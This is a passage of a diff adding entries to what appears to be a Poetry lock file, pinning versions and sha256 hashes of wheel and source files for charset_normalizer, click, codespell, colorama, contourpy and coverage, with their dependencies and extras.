+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-win32.whl", hash = "sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-win_amd64.whl", hash = "sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-win32.whl", hash = "sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-win_amd64.whl", hash = "sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_aarch64.whl", hash = "sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_i686.whl", hash = "sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_ppc64le.whl", hash = "sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_s390x.whl", hash = "sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_x86_64.whl", hash = "sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-win32.whl", hash = "sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-win32.whl", hash = "sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_s390x.whl", hash = "sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-win32.whl", hash = "sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765"},
+ {file = "charset_normalizer-3.4.1-py3-none-any.whl", hash = "sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85"},
+ {file = "charset_normalizer-3.4.1.tar.gz", hash = "sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3"},
+]
+
+[[package]]
+name = "click"
+version = "8.1.8"
+description = "Composable command line interface toolkit"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "click-8.1.8-py3-none-any.whl", hash = "sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2"},
+ {file = "click-8.1.8.tar.gz", hash = "sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a"},
+]
+
+[package.dependencies]
+colorama = {version = "*", markers = "platform_system == \"Windows\""}
+
+[[package]]
+name = "codespell"
+version = "2.3.0"
+description = "Codespell"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "codespell-2.3.0-py3-none-any.whl", hash = "sha256:a9c7cef2501c9cfede2110fd6d4e5e62296920efe9abfb84648df866e47f58d1"},
+ {file = "codespell-2.3.0.tar.gz", hash = "sha256:360c7d10f75e65f67bad720af7007e1060a5d395670ec11a7ed1fed9dd17471f"},
+]
+
+[package.extras]
+dev = ["Pygments", "build", "chardet", "pre-commit", "pytest", "pytest-cov", "pytest-dependency", "ruff", "tomli", "twine"]
+hard-encoding-detection = ["chardet"]
+toml = ["tomli"]
+types = ["chardet (>=5.1.0)", "mypy", "pytest", "pytest-cov", "pytest-dependency"]
+
+[[package]]
+name = "colorama"
+version = "0.4.6"
+description = "Cross-platform colored terminal text."
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
+files = [
+ {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
+ {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
+]
+
+[[package]]
+name = "contourpy"
+version = "1.1.1"
+description = "Python library for calculating contours of 2D quadrilateral grids"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "contourpy-1.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:46e24f5412c948d81736509377e255f6040e94216bf1a9b5ea1eaa9d29f6ec1b"},
+ {file = "contourpy-1.1.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:0e48694d6a9c5a26ee85b10130c77a011a4fedf50a7279fa0bdaf44bafb4299d"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a66045af6cf00e19d02191ab578a50cb93b2028c3eefed999793698e9ea768ae"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4ebf42695f75ee1a952f98ce9775c873e4971732a87334b099dde90b6af6a916"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6aec19457617ef468ff091669cca01fa7ea557b12b59a7908b9474bb9674cf0"},
+ {file = "contourpy-1.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:462c59914dc6d81e0b11f37e560b8a7c2dbab6aca4f38be31519d442d6cde1a1"},
+ {file = "contourpy-1.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:6d0a8efc258659edc5299f9ef32d8d81de8b53b45d67bf4bfa3067f31366764d"},
+ {file = "contourpy-1.1.1-cp310-cp310-win32.whl", hash = "sha256:d6ab42f223e58b7dac1bb0af32194a7b9311065583cc75ff59dcf301afd8a431"},
+ {file = "contourpy-1.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:549174b0713d49871c6dee90a4b499d3f12f5e5f69641cd23c50a4542e2ca1eb"},
+ {file = "contourpy-1.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:407d864db716a067cc696d61fa1ef6637fedf03606e8417fe2aeed20a061e6b2"},
+ {file = "contourpy-1.1.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dfe80c017973e6a4c367e037cb31601044dd55e6bfacd57370674867d15a899b"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e30aaf2b8a2bac57eb7e1650df1b3a4130e8d0c66fc2f861039d507a11760e1b"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3de23ca4f381c3770dee6d10ead6fff524d540c0f662e763ad1530bde5112532"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:566f0e41df06dfef2431defcfaa155f0acfa1ca4acbf8fd80895b1e7e2ada40e"},
+ {file = "contourpy-1.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b04c2f0adaf255bf756cf08ebef1be132d3c7a06fe6f9877d55640c5e60c72c5"},
+ {file = "contourpy-1.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d0c188ae66b772d9d61d43c6030500344c13e3f73a00d1dc241da896f379bb62"},
+ {file = "contourpy-1.1.1-cp311-cp311-win32.whl", hash = "sha256:0683e1ae20dc038075d92e0e0148f09ffcefab120e57f6b4c9c0f477ec171f33"},
+ {file = "contourpy-1.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:8636cd2fc5da0fb102a2504fa2c4bea3cbc149533b345d72cdf0e7a924decc45"},
+ {file = "contourpy-1.1.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:560f1d68a33e89c62da5da4077ba98137a5e4d3a271b29f2f195d0fba2adcb6a"},
+ {file = "contourpy-1.1.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:24216552104ae8f3b34120ef84825400b16eb6133af2e27a190fdc13529f023e"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56de98a2fb23025882a18b60c7f0ea2d2d70bbbcfcf878f9067234b1c4818442"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:07d6f11dfaf80a84c97f1a5ba50d129d9303c5b4206f776e94037332e298dda8"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1eaac5257a8f8a047248d60e8f9315c6cff58f7803971170d952555ef6344a7"},
+ {file = "contourpy-1.1.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:19557fa407e70f20bfaba7d55b4d97b14f9480856c4fb65812e8a05fe1c6f9bf"},
+ {file = "contourpy-1.1.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:081f3c0880712e40effc5f4c3b08feca6d064cb8cfbb372ca548105b86fd6c3d"},
+ {file = "contourpy-1.1.1-cp312-cp312-win32.whl", hash = "sha256:059c3d2a94b930f4dafe8105bcdc1b21de99b30b51b5bce74c753686de858cb6"},
+ {file = "contourpy-1.1.1-cp312-cp312-win_amd64.whl", hash = "sha256:f44d78b61740e4e8c71db1cf1fd56d9050a4747681c59ec1094750a658ceb970"},
+ {file = "contourpy-1.1.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:70e5a10f8093d228bb2b552beeb318b8928b8a94763ef03b858ef3612b29395d"},
+ {file = "contourpy-1.1.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8394e652925a18ef0091115e3cc191fef350ab6dc3cc417f06da66bf98071ae9"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c5bd5680f844c3ff0008523a71949a3ff5e4953eb7701b28760805bc9bcff217"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:66544f853bfa85c0d07a68f6c648b2ec81dafd30f272565c37ab47a33b220684"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e0c02b75acfea5cab07585d25069207e478d12309557f90a61b5a3b4f77f46ce"},
+ {file = "contourpy-1.1.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:41339b24471c58dc1499e56783fedc1afa4bb018bcd035cfb0ee2ad2a7501ef8"},
+ {file = "contourpy-1.1.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:f29fb0b3f1217dfe9362ec55440d0743fe868497359f2cf93293f4b2701b8251"},
+ {file = "contourpy-1.1.1-cp38-cp38-win32.whl", hash = "sha256:f9dc7f933975367251c1b34da882c4f0e0b2e24bb35dc906d2f598a40b72bfc7"},
+ {file = "contourpy-1.1.1-cp38-cp38-win_amd64.whl", hash = "sha256:498e53573e8b94b1caeb9e62d7c2d053c263ebb6aa259c81050766beb50ff8d9"},
+ {file = "contourpy-1.1.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:ba42e3810999a0ddd0439e6e5dbf6d034055cdc72b7c5c839f37a7c274cb4eba"},
+ {file = "contourpy-1.1.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:6c06e4c6e234fcc65435223c7b2a90f286b7f1b2733058bdf1345d218cc59e34"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ca6fab080484e419528e98624fb5c4282148b847e3602dc8dbe0cb0669469887"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:93df44ab351119d14cd1e6b52a5063d3336f0754b72736cc63db59307dabb718"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:eafbef886566dc1047d7b3d4b14db0d5b7deb99638d8e1be4e23a7c7ac59ff0f"},
+ {file = "contourpy-1.1.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:efe0fab26d598e1ec07d72cf03eaeeba8e42b4ecf6b9ccb5a356fde60ff08b85"},
+ {file = "contourpy-1.1.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:f08e469821a5e4751c97fcd34bcb586bc243c39c2e39321822060ba902eac49e"},
+ {file = "contourpy-1.1.1-cp39-cp39-win32.whl", hash = "sha256:bfc8a5e9238232a45ebc5cb3bfee71f1167064c8d382cadd6076f0d51cff1da0"},
+ {file = "contourpy-1.1.1-cp39-cp39-win_amd64.whl", hash = "sha256:c84fdf3da00c2827d634de4fcf17e3e067490c4aea82833625c4c8e6cdea0887"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:229a25f68046c5cf8067d6d6351c8b99e40da11b04d8416bf8d2b1d75922521e"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a10dab5ea1bd4401c9483450b5b0ba5416be799bbd50fc7a6cc5e2a15e03e8a3"},
+ {file = "contourpy-1.1.1-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:4f9147051cb8fdb29a51dc2482d792b3b23e50f8f57e3720ca2e3d438b7adf23"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:a75cc163a5f4531a256f2c523bd80db509a49fc23721b36dd1ef2f60ff41c3cb"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3b53d5769aa1f2d4ea407c65f2d1d08002952fac1d9e9d307aa2e1023554a163"},
+ {file = "contourpy-1.1.1-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:11b836b7dbfb74e049c302bbf74b4b8f6cb9d0b6ca1bf86cfa8ba144aedadd9c"},
+ {file = "contourpy-1.1.1.tar.gz", hash = "sha256:96ba37c2e24b7212a77da85004c38e7c4d155d3e72a45eeaf22c1f03f607e8ab"},
+]
+
+[package.dependencies]
+numpy = {version = ">=1.16,<2.0", markers = "python_version <= \"3.11\""}
+
+[package.extras]
+bokeh = ["bokeh", "selenium"]
+docs = ["furo", "sphinx (>=7.2)", "sphinx-copybutton"]
+mypy = ["contourpy[bokeh,docs]", "docutils-stubs", "mypy (==1.4.1)", "types-Pillow"]
+test = ["Pillow", "contourpy[test-no-images]", "matplotlib"]
+test-no-images = ["pytest", "pytest-cov", "wurlitzer"]
+
+[[package]]
+name = "coverage"
+version = "7.6.1"
+description = "Code coverage measurement for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "coverage-7.6.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:b06079abebbc0e89e6163b8e8f0e16270124c154dc6e4a47b413dd538859af16"},
+ {file = "coverage-7.6.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:cf4b19715bccd7ee27b6b120e7e9dd56037b9c0681dcc1adc9ba9db3d417fa36"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e61c0abb4c85b095a784ef23fdd4aede7a2628478e7baba7c5e3deba61070a02"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fd21f6ae3f08b41004dfb433fa895d858f3f5979e7762d052b12aef444e29afc"},
+ {file = "coverage-7.6.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f59d57baca39b32db42b83b2a7ba6f47ad9c394ec2076b084c3f029b7afca23"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:a1ac0ae2b8bd743b88ed0502544847c3053d7171a3cff9228af618a068ed9c34"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:e6a08c0be454c3b3beb105c0596ebdc2371fab6bb90c0c0297f4e58fd7e1012c"},
+ {file = "coverage-7.6.1-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f5796e664fe802da4f57a168c85359a8fbf3eab5e55cd4e4569fbacecc903959"},
+ {file = "coverage-7.6.1-cp310-cp310-win32.whl", hash = "sha256:7bb65125fcbef8d989fa1dd0e8a060999497629ca5b0efbca209588a73356232"},
+ {file = "coverage-7.6.1-cp310-cp310-win_amd64.whl", hash = "sha256:3115a95daa9bdba70aea750db7b96b37259a81a709223c8448fa97727d546fe0"},
+ {file = "coverage-7.6.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7dea0889685db8550f839fa202744652e87c60015029ce3f60e006f8c4462c93"},
+ {file = "coverage-7.6.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed37bd3c3b063412f7620464a9ac1314d33100329f39799255fb8d3027da50d3"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d85f5e9a5f8b73e2350097c3756ef7e785f55bd71205defa0bfdaf96c31616ff"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9bc572be474cafb617672c43fe989d6e48d3c83af02ce8de73fff1c6bb3c198d"},
+ {file = "coverage-7.6.1-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0c0420b573964c760df9e9e86d1a9a622d0d27f417e1a949a8a66dd7bcee7bc6"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:1f4aa8219db826ce6be7099d559f8ec311549bfc4046f7f9fe9b5cea5c581c56"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:fc5a77d0c516700ebad189b587de289a20a78324bc54baee03dd486f0855d234"},
+ {file = "coverage-7.6.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:b48f312cca9621272ae49008c7f613337c53fadca647d6384cc129d2996d1133"},
+ {file = "coverage-7.6.1-cp311-cp311-win32.whl", hash = "sha256:1125ca0e5fd475cbbba3bb67ae20bd2c23a98fac4e32412883f9bcbaa81c314c"},
+ {file = "coverage-7.6.1-cp311-cp311-win_amd64.whl", hash = "sha256:8ae539519c4c040c5ffd0632784e21b2f03fc1340752af711f33e5be83a9d6c6"},
+ {file = "coverage-7.6.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:95cae0efeb032af8458fc27d191f85d1717b1d4e49f7cb226cf526ff28179778"},
+ {file = "coverage-7.6.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:5621a9175cf9d0b0c84c2ef2b12e9f5f5071357c4d2ea6ca1cf01814f45d2391"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:260933720fdcd75340e7dbe9060655aff3af1f0c5d20f46b57f262ab6c86a5e8"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:07e2ca0ad381b91350c0ed49d52699b625aab2b44b65e1b4e02fa9df0e92ad2d"},
+ {file = "coverage-7.6.1-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c44fee9975f04b33331cb8eb272827111efc8930cfd582e0320613263ca849ca"},
+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:877abb17e6339d96bf08e7a622d05095e72b71f8afd8a9fefc82cf30ed944163"},
+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:3e0cadcf6733c09154b461f1ca72d5416635e5e4ec4e536192180d34ec160f8a"},
